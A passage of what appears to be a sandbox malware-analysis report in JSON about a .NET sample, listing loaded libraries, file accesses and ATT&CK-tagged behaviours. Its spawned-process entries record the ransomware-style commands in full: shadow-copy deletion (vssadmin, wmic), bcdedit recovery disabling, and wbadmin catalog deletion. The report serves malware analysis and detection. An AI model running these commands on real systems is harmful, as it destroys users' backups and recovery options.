module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6cd60000\n \"WMIC.exe\" loaded module \"OLEAUT32.DLL\" at base 75f00000\n \"cmd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74c20000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 75fa0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"wbadmin.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"wbadmin.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"wbadmin.exe\" loaded module \"KERNEL32\" at base 75fa0000\n \"wbadmin.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"wbadmin.exe\" loaded module \"ADVAPI32.DLL\" at base 75310000\n \"wbadmin.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 757e0000\n \"wbadmin.exe\" loaded module \"CLBCATQ.DLL\" at base 76d10000\n \"wbadmin.exe\" loaded module \"CRYPTSP.DLL\" at base 74780000\n \"wbadmin.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74510000\n \"wbadmin.exe\" loaded module \"KERNEL32.DLL\" at base 75fa0000\n \"wbadmin.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c70000\n \"wbadmin.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74d10000\n \"wbadmin.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BLB_PS.DLL\" at base 6f370000\n \"wbadmin.exe\" loaded module \"OLEAUT32.DLL\" at base 75f00000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Serv759bfb78#\\434d944356ef49383de75240670cd55f\\System.ServiceProcess.ni.dll (UID: 00000000-00004160)\n \"vssadmin.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003904)\n \"vssadmin.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003904)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\msxml3r.dll (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003644)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001204)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001204)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001204)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001204)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003540)\n \"wbadmin.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003540)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"WMIC.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WMIC.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"wbadmin.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"wbadmin.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"svchost.exe\" (UID: 00000000-00004160)\n Spawned process \"cmd.exe\" with commandline \"/C vssadmin delete shadows /all /quiet & wmic shadowcopy delete\" (UID: 00000000-00005988)\n Spawned process \"vssadmin.exe\" with commandline \"vssadmin delete shadows /all /quiet\" (UID: 00000000-00003904)\n Spawned process \"WMIC.exe\" with commandline \"wmic shadowcopy delete\" (UID: 00000000-00003644)\n Spawned process \"cmd.exe\" with commandline \"/C bcdedit /set {default} bootstatuspolicy ignoreallfailures & b ...\" (UID: 00000000-00004152)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} bootstatuspolicy ignoreallfailures\" (UID: 00000000-00004452)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} recoveryenabled no\" (UID: 00000000-00003324)\n Spawned process \"cmd.exe\" with commandline \"/C wbadmin delete catalog -quiet\" (UID: 00000000-00001204)\n Spawned process \"wbadmin.exe\" with commandline \"wbadmin delete catalog -quiet\" (UID: 00000000-00003540)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"svchost.exe\" (UID: 00000000-00004160)\n Spawned process \"cmd.exe\" with commandline \"/C vssadmin delete shadows /all /quiet & wmic shadowcopy delete\" (UID: 00000000-00005988)\n Spawned process \"vssadmin.exe\" with commandline \"vssadmin delete shadows /all /quiet\" (UID: 00000000-00003904)\n Spawned process \"WMIC.exe\" with commandline \"wmic shadowcopy delete\" (UID: 00000000-00003644)\n Spawned process \"cmd.exe\" with commandline \"/C bcdedit /set {default} bootstatuspolicy ignoreallfailures & b ...\" (UID: 00000000-00004152)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} bootstatuspolicy ignoreallfailures\" (UID: 00000000-00004452)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} recoveryenabled no\" (UID: 00000000-00003324)\n Spawned process \"cmd.exe\" with commandline \"/C wbadmin delete catalog -quiet\" (UID: 00000000-00001204)\n Spawned process \"wbadmin.exe\" with commandline \"wbadmin delete catalog -quiet\" (UID: 00000000-00003540)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"vssadmin.exe\" (UID: 00000000-00003904) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"cmd.exe\" (UID: 00000000-00004152) was launched with missing environment variables: \"PROMPT\"\n Process \"bcdedit.exe\" (UID: 00000000-00004452) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"cmd.exe\" (UID: 00000000-00001204) was launched with missing environment variables: \"PROMPT\"\n Process \"wbadmin.exe\" (UID: 00000000-00003540) was launched with new environment variables: \"PROMPT=\"$P$G\"\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\" was detected as \".NET\" and name: \"Library\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"svchost.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"svchost.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"svchost.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"svchost.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"svchost.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll.aux\"\n \"svchost.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll.aux\"\n \"svchost.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.serv759bfb78#\\434d944356ef49383de75240670cd55f\\system.serviceprocess.ni.dll.aux\"\n \"svchost.exe\" reads file \"c:\\torservice\\tor\\pluggable_transports\\bridges_list.meek-azure.txt\"\n \"svchost.exe\" reads file \"c:\\users\\%osuser%\\downloads\\dbpilnnnf.doc\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe.config\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\77\\\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.INI\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\read_it.txt\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe.Local\\\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe:Zone.Identifier\"\n \"svchost.exe\" trying to access non-existent file 